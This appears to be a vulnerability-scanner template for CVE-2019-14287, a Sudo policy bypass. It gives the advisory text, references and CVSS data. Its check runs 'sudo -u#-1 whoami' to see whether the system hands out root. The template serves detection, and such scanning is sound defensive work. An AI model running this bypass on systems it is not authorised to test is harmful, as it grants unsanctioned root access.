In Sudo before 1.8.28, an attacker with access to a Runas ALL sudoer account can bypass certain policy blacklists and session PAM modules, and can cause incorrect logging, by invoking sudo with a crafted user ID. For example, this allows bypass of !root configuration, and USER= logging, for a "sudo -u \#$((0xffffffff))" command.
PoC代码[已公开]
id: CVE-2019-14287
info:
name: Sudo <= 1.8.27 - Security Bypass
author: daffainfo
severity: high
description: |
In Sudo before 1.8.28, an attacker with access to a Runas ALL sudoer account can bypass certain policy blacklists and session PAM modules, and can cause incorrect logging, by invoking sudo with a crafted user ID. For example, this allows bypass of !root configuration, and USER= logging, for a "sudo -u \#$((0xffffffff))" command.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14287
- https://www.exploit-db.com/exploits/47502
- http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00042.html
- http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00047.html
- http://packetstormsecurity.com/files/154853/Slackware-Security-Advisory-sudo-Updates.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2019-14287
cwe-id: CWE-755
epss-score: 0.84563
epss-percentile: 0.99283
cpe: cpe:2.3:a:sudo_project:sudo:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: sudo_project
product: sudo
tags: packetstorm,cve,cve2019,sudo,code,linux,privesc,local,canonical,sudo_project
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
- engine:
- sh
- bash
source: |
sudo -u#-1 whoami
matchers:
- type: dsl
dsl:
- '!contains(code_1_response, "root")'
- 'contains(code_2_response, "root")'
condition: and
# digest: 490a0046304402200dbdf1b214826d9791fd318aa0d699c47603dfd65e9aee85039cb577cddc9af5022017a612d78f588c0b8eb20458e8ae98dc79f5978f63b49badd5dac811fe9e806a:922c64590222798bb761d5b6d8e72950